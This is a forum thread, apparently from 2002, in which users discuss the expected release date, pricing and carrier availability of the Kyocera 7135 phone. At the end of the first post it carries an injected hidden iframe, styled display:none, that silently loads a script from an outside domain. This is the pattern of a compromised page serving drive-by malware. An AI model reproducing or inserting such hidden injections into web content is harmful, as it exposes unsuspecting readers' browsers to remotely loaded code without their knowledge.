I don't know if anybody else noticed this, (I didnt find it using the search) but I found a release date right on the home page of barginpda.com (on the lower left with a bunch of dates for other products) which states 11/1/2002......
Who knows how much validity is behind this date, but I thought everybody here should be aware of it! All this waiting makin me head spin :spin But I'm sure that whenever it gets here it will be worth the wait.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Been lurking around the site for about a month and 1/2, first post. Great information. I went to my Verizon store and asked if they knew the release date and they said the 7135 still had to pass some testing, but 4th quarter was still the plan. I asked if I could pre order they said no, but took my name and number and said they would call me and let me know as soon as they came in. Very helpful people. Thanks again for all the posts and the information.
I am pretty certain that barginpda's release date is just a guesstimate - but its interesting to find a posted date anyways. The best place to find the release date for the 7135 is going to be... HERE
I found an old number to a business rep from Verizon who I had dealt with a number of months ago when I was investigating the Thera when it first came out (okay, okay, it was before I knew of the existence of the 7135 ). Anyway, I called the guy this morning to see if he could tell me anything about the 7135’s arrival. He said he spoke to his Kyocera rep yesterday (7 Oct) who said that the 7135 will be available to Verizon November 1st. He mentioned also that the business channel should get them first before the retail stores. Unfortunately, he has moved to Vegas (I live in the Phoenix area) and so he referred me the current rep for the Phoenix area. I contacted her today by email. She replied that she hadn’t heard much about the phone and she referred me to the Verizon wireless website . I wrote her back and told her of this forum and how there are lots and lots of us who would gladly buy this phone today if Verizon would sell it to us. I also explained our collective state of frenzy and asked her if there was some way she could get the phone to us early or offer some kind of deal to the 1500 or so of us registered on this forum. I told her that we early-adopters become walking advertisements, evangelizing our devices to everyone around us. She wrote back and said she was excited to hear of the demand for the phone and that she would let me know as soon as it was available. She also said she would email her Kyocera rep directly and let me know whatever she finds out. As soon as I hear back from her I will add it to this post.
I agree with Steve. This would only give them the reason to push the price higher. But then again they probably already know how many people are out there anticipating its release by the email notification request.
I sure hope our enthusiasm doesn't jack the price up. At the same time, the majority of cell phone users out there don't give a damn about this phone (a lot, I know it's hard to believe), so maybe we'll do alright on the price. Let's face it, most younger users driving the overall market like smaller/lighter. And the competitioon is fierce. Again, if KYO doesn't release this before Xmas, they won't get anywhere near the price they're hoping due to competition. There's some sweet phones out there (and getting sweeter all the time.)
I will balk if it's at $500+ with no deals or concessions from Sprint with a 1 year contract.
Yeah, I ordered a Garmin Rino combo FRS/GPS in May for a trip. Garmin had a release date of April. Then they changed to June... then July... then August... and I am still waiting to hear on it. Online places just give their best guess and wait to see what the reality is. It drives more folks to buy than a "Not Yet Released" notice in the ad.
If they really want to drive more to buy them, they should set up a pre-order option-- Problem with that is if they havent settled on a price then they would probably end up either with a loss or with a group of disgruntled overpaying customers!
Hey all, I just registered. I've been lurking for weeks. Just like the 6035, I'm sure the release date will surprise us (pleasantly!). I bet before the end of the month we'll be enjoying the latest and greatest!

Were you able to hook your Garmin to your 6035?
If nobody can make use of the 7135's e911 GPS thingy, I would like to hook the 7135 to a Garmin as well- do you have a special cable for kyo-garmin? can you hook a ashtray charger to the 6035 at the same time your connected to the Garmin?
